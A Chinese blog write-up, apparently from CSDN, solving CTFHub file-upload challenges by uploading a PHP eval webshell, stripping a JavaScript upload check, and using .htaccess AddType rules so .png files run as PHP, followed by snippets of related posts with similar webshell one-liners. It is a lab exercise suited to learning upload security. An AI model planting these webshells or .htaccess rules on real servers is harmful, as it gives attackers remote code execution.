CTFHUB-技能树-Web题-文件上传(无验证,JS前端验证,前端验证)

已于 2024-05-09 21:13:09 修改
阅读量1.9k 收藏 18
点赞数 18
CC 4.0 BY-SA版权
分类专栏: CTFHUB解题思路 文章标签: 前端 javascript 开发语言
于 2024-04-15 21:35:08 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/Static______/article/details/137796247

CTFHUB-技能树-Web题-文件上传(无验证,JS前端验证,前端验证—.htaccess)

文章目录

文件上传

无验证

尝试上传一个php木马文件,1.php

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

上传后显示相对路径,访问此路径,发现可以访问,且木马执行成功

在这里插入图片描述

使用菜刀、蚂剑等工具连接,寻找flag即可

这里使用蚂剑连接

在这里插入图片描述

JS前端验证

提示JS前端验证,我们就需要查看前端代码。
在这里插入图片描述

调出js代码发现,只允许上传pg,png,gif

在这里插入图片描述

将这里得onsubmit触发js删除掉,再进行上传即可

上传一句话php一句话木马

<?php @eval($_POST['pass']);phpinfo();?>

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

访问成功

在这里插入图片描述

利用蚁剑连接,寻找flag

在这里插入图片描述

在html中发现flag

在这里插入图片描述

前端验证—.htaccess

htaccess文件是Apache服务器中的一个配置文件,它负责相关目录下的网页配置。通过htaccess文件,可以帮我们实现:网页301重定向、自定义404错误页面、改变文件扩展名、允许/阻止特定的用户或者目录的访问、禁止目录列表、配置默认文档等功能

总结来说就是一种配置文件,里面可以书写一些配置,如将某一文件以某种特定拓展名解析。
题目解析

经查看网页源代码,发现过滤了文件类型。

在这里插入图片描述

根据提示,应上传.htaccess文件

先编写一个.htaccess文件。保存的时候命名直接为.htaccess。

AddType application/x-httpd-php .png


AddType application/x-httpd-php .php

  加入“AddType application/x-httpd-php .php”、

  “AddType application/x-httpd-php .html”两行,你也可以加入更多,实质就是添加可以执行php的文件类型,比如你再加上一行
  
  “AddType application/x-httpd-php .htm”,则.htm文件也可以执行php程序了,你甚至还可以添加上一行

  “AddType application/x-httpd-php .txt”,让普通的文本文件格式也能运行php程序。

在这里插入图片描述

代码段是将png格式文件按php文件进行解析

关于如何生成htaccess文件

选择【文件】》【另存为…】后,弹出的【另存为】对话框,在【文件名】一栏中输入【.htaccess】,【保存类型】选择【所有文件】,然后选择要保存的路径,单击【保存】按钮!

上传htaccess文件

在这里插入图片描述

此时,再上传一句话木马,并把文件改为png格式
在这里插入图片描述
在这里插入图片描述

我们先访问一下,发现代码执行

在这里插入图片描述

最后使用蚁剑连接,寻找flag

在这里插入图片描述

再html中找到flag文件
在这里插入图片描述

CTFHub技能树 Web-文件上传 详解
weixin_45808483的博客
11-15 3099
验证 启动环境 我们上传一句话木马 <?php @eval($_POST['shell']);?> 提示了相对路径, 我们直接使用蚁剑连接。 找到flag。 前端验证 上传php文件,前端校验不允许上传php文件 审计代码,只允许上传图片类型 我们先将后缀改为 .jpg 上传成功 再通过burp抓包,修改filename="1.php"和Content-Type: php 发送数据包,页面显示上传成功 使用蚁剑连接 成...
ctfhub-web-文件上传
m0_52484587的博客
08-28 1014
● 一般来说,配置文件的作用范围都是全局的,但Apache提供了一种很方便的、可作用于当前目录及其子目录的配置文件——.htaccess(分布式配置文件),● 提供了针对目录改变配置的方法, 即,在一个特定的文档目录中放置一个包含一个或多个指令的文件, 以作用于此目录及其所有子目录。● 是设定某种扩展名的文件用一种应用程序来打开的方式类型,当该扩展名文件被访问的时候,浏览器会自动使用指定应用程序来打开。只能上传.jpg,.png,.gif三种格式的文件,前端上传jpg,修改数据包进行上传。
【刷13】CTFHub技能树-文件上传
star3119391396的博客
11-20 1328
CTFHub技能树-文件上传
CTFHUB 文件上传漏洞
qq_75120258的博客
02-04 993
定义:文件上传漏洞是web系统中常见的一种功能,通过文件上传能实现上传图片、视频,以及其他类型的文件,但是随着web中包含的功能越来越多,潜在的网络安全风险也就越大。如果恶意用户上传了可执行的文件或者脚本,就会导致网站被其控制甚至会使其服务器沦陷,以至于引发恶意的网络安全事件。一般是因为站点开放了文件上传功能,但却对上传的文件没有进行足够的限制。程序开发部署时,没有考虑到系统特性、过滤不严格。站点服务器存在解析漏洞,被黑客利用后导致可以上传任意文件。
CTFHub技能树-文件上传
最新发布
star3119391396的博客
04-23 962
● 一般来说,配置文件的作用范围都是全局的,但Apache提供了一种很方便的、可作用于当前目录及其子目录的配置文件——.htaccess(分布式配置文件),● 提供了针对目录改变配置的方法, 即,在一个特定的文档目录中放置一个包含一个或多个指令的文件, 以作用于此目录及其所有子目录。● 简单来说,就是我上传了一个.htaccess文件到服务器,那么服务器之后就会将特定格式的文件以php格式解析。根据前端提示,发现上传类型限制成了jpg,png,gif文件,并且如果文件类型被允许,构造目标路径(
CTFHub | 前端验证
尼泊罗河伯的博客
02-25 2201
前端验证是通过对客户端输入数据的合法性进行检查来确保数据是有效且安全的。通常,它会通过一系列简单的规则,如长度检查、格式检查、正则表达式匹配等,验证用户输入是否符合要求,以提高应用程序的安全性和可用性。
ctfhub 文件上传验证
m0_52432374的博客
02-18 543
ctfhub验证方法: 目名称就叫做无验证-文件上传,那么无验证–>对上传的文件没有做任何验证。所以上传木马–>获得靶机shell–>利用蚁剑在网站(服务器)中寻找flag。 1.上传yjh.php 2.得到上传文件相对路径upload/yjh.php 3.构造payload: http://challenge-f31f46b88104a514.sandbox.ctfhub.com:10080/upload/yjh.php 4.用蚁剑连接,找到flag文件 ...
ctfhub文件上传---验证
x2813488062的博客
01-26 1202
思路 目字面意思--验证,即对所上传文件无任何验证思路:上传木马文件--获取靶机shell--访问服务器 "shell" - 取得对服务器某种程度上操作权限 上传shell.php 一句话木马文件 <?php eval(@$_POST['cmd']); ?> eval是执行命令的函数 $_POST['cmd']是接收的数据 上传成功后拿到文件的相对路径进行访问 查看木马是否上传成功 可给cmd传递数据进行查看 木马中接收方法为POST 所有..
CTFHUB技能树文件上传——无验证
weixin_73049307的博客
10-21 751
成功提交并显示了上传的文件的路径。
CTFHUB-技能树-Web-文件上传前端验证—文件头检查)
Static______的博客
04-17 1528
由此可见,只要是相同类型的文件,他的文件头就是一样的,这样代表了这个文件是属于什么类型,既然本用到的是文件头检查,那我们制作一个图片马,将我们的一句话代码放入图片里面然后进行上传。我们先创造一个名为1.png的图片,然后写一个名为1.php的一句话代码,把他们放到同一目录下,用cmd生成一个名为2.php的图片马。右侧开头%PNG就是这个文件的文件头,这也代表了这个文件是一个png文件,打开一个jpg文件。简单来说,就是每个文件的最开头部分,就是文件头,他代表了这个文件的是属于什么类型,例如。
CTFHUB-技能树-WEB通关
Alita_lxz的博客
11-11 7864
Web 目来自ctfhub技能树web部分 Web前置技能 操作系统 数据库 HTTP协议 请求方式 HTTP 请求方法, HTTP/1.1协议中共定义了八种方法(也叫动作)来以不同方式操作指定的资源。 ​ 1.OPTIONS   返回服务器针对特定资源所支持的HTTP请求方法。也可以利用向Web服务器发送’*'的请求来测试服务器的功能性,如获取当前URL所支持的方法。若请求成功,则它会在HTTP头中包含一个名为“Allow”的头,值是所支持的方法,如“GET,POST”。  2.HEAD   向服务
3.18号日报,ctfhubweb文件上传漏洞目解法
03-18
本文将基于标“3.18号日报,ctfhubweb文件上传漏洞目解法”以及描述“文件上传漏洞”,详细介绍几种典型的文件上传漏洞利用方法及其技术细节。 #### 一、无验证直接上传一句话木马 这类目是最简单的,...
CTFHub技能树web文件上传(一)
wzhwzh123321的博客
02-15 1449
使用蚁剑连接,上传的.htaccess文件文件名字只能是.htaccess,只能有后缀而不能有文件的名,比如1.htaccess等,在第一次上传中我使用了1.htaccess,在后续上传jpg格式文件后服务器没有自动将jpg解析为php文件,需要注意。JavaScript会对我们上传的文件进行限制,允许图片格式上传,可以通过上传图片马或者使用bp修改一下文件后缀即可,本使用bp修改文件后缀的方法,先将文件后缀修改为.jpg格式,文件上传然后抓包。文件上传目录权限:确保上传目录的适当权限设置非常重要。
CTFHub-Web-文件上传
qq_54037445的博客
11-29 3386
htaccess文件是Apache服务器中的一个配置文件,它负责相关目录下的网页配置。通过htaccess文件,可以帮我们实现:网页301重定向、自定义404错误页面、改变文件扩展名、允许/阻止特定的用户或者目录的访问、禁止目录列表、配置默认文档等功能;前端验证,只能上传图片中列出的类型将文件名后缀含有的这些全部替换为空。
CTFHUB——文件上传前端验证
wuuconix's blog
09-01 1129
网页源码 <body> <h1>CTFHub 文件上传 - js前端验证</h1> <form action="" method="post" enctype="multipart/form-data" onsubmit="return checkfilesuffix()"> <label for="file">Filename:</label> <input type="file"
CTFHUB-技能树-Web-文件上传前端验证—MIME绕过、00截断、00截断-双写后缀)
Static______的博客
04-16 3444
参考链接:http://www.admintony.com/%E5%85%B3%E4%BA%8E%E4%B8%8A%E4%BC%A0%E4%B8%AD%E7%9A%8400%E6%88%AA%E6%96%AD%E5%88%86%E6%9E%90.html。00截断简单来说,就是由于php解释器是由C语言编写的,所以遵循C语言解析文件时遇到ascll码0时停止解析,而%00表示ascll码中的0,所以php解释器在解析文件时遇到%00就会默认文件名已经解析结束,所以我们可以利用这一原理进行上传。
CTFHub技能树 Web-文件上传详解
千寻的博客
11-21 5586
文件上传漏洞是指由于程序员在对用户文件上传部分的控制不足或者处理缺陷,而导致的用户可以越过其本身权限向服务器上上传可执行的动态脚本文件。这里上传的文件可以是木马,病毒,恶意脚本或者WebShell等。“文件上传”本身没有问,有问的是文件上传后,服务器怎么处理、解释文件。如果服务器的处理逻辑做的不够安全,则会导致严重的后果。 ———————————————— 版权声明:本文为优快云博主「Fasthand_」的原创文章,遵循CC 4.0 BY-SA版权协议,转载请附上原文出处链接及本声明。 原文链接:ht
CTFHub |文件上传 (无验证前端验证, .haccess绕过, MIME绕过, 00截断, 双写后缀, 文件头检查)
weixin_73688004的博客
03-09 1440
这里很奇特的一点:我尝试构造a.phpphp,上传后的文件是a. 也就是说,两个php都被替换为空了。猜测这个str_ireplace()函数应该是设置一个指针,遍历整个字符串,边遍历便查找,一经找到就删除,继续往后查找,而不是找到第一个就删除并返回。复制89504E47, 在文件开头>编辑>剪贴板数据>粘贴>ASCII Hex, 保存退出。这里有两个Content-Type字段,第一个用来限定文件显示范围的,第二个才是限定文件类型。第一种方法:按理来说应该也可以,上传也成功,但是出现不解的问
ctfhub.htaccess
03-13
### CTFHub 中 `.htaccess` 配置文件详解 `.htaccess` 是 Apache Web 服务器使用的配置文件,用于改变特定目录下的配置设置。对于 CTF 平台如 CTFHub 来说,合理配置此文件可以增强安全性并控制访问权限。 #### 安全强化措施 为了防止恶意利用和提升平台的安全性,在 `.htaccess` 文件中通常会加入如下安全策略: - **阻止 PHP 文件执行** 对于某些敏感路径或者不需要解析 PHP 的静态资源目录,可以通过以下方式禁用 PHP 解析器,从而减少潜在风险[^1]。 ```apache php_flag engine off ``` - **限制文件上传类型** 控制允许上传的 MIME 类型有助于防范非法文件类型的注入攻击。具体实现方法是在相应目录下添加如下指令来限定可接受的内容类型[^2]。 ```apache <FilesMatch "\.(php|pl|py|jsp|asp|html|htm|js|css)$"> SetHandler None </FilesMatch> # Allow only specific file types to be uploaded. ForceType application/octet-stream Header set Content-Disposition attachment ``` - **保护重要文件不被下载** 特定情况下需要确保一些重要的配置文件不会因为错误配置而暴露在外网环境中。为此可以在根目录下的 `.htaccess` 添加规则以拒绝直接访问这些文件[^3]。 ```apache <Files ~ "^.*\.(env|ini|conf|log)"> Order allow,deny Deny from all </Files> ``` 上述配置不仅能够有效提高系统的整体防护能力,同时也为参赛者提供了一个更加公平公正的比赛环境。 #### 示例解释 假设在一个典型的 CTF 场景里,管理员希望做到两点:一是禁止任何人在 `/uploads/` 目录下运行脚本;二是当有人尝试浏览该目录时自动将其重定向至首页。那么对应的 `.htaccess` 可能看起来像这样: ```apache <IfModule mod_rewrite.c> RewriteEngine On # Redirect requests for /uploads/* back to home page RewriteRule ^uploads/(.*)$ /index.php [R=301,L] # Disable script execution within uploads folder AddHandler cgi-script .php .pl .py .jsp .asp .sh .cgi Options -ExecCGI </IfModule> # Prevent directory listing Options -Indexes ``` 以上代码片段实现了两个目标——既不允许在指定区域内执行任意程序也不让未经授权的人查看内部结构。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

python炒粉

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值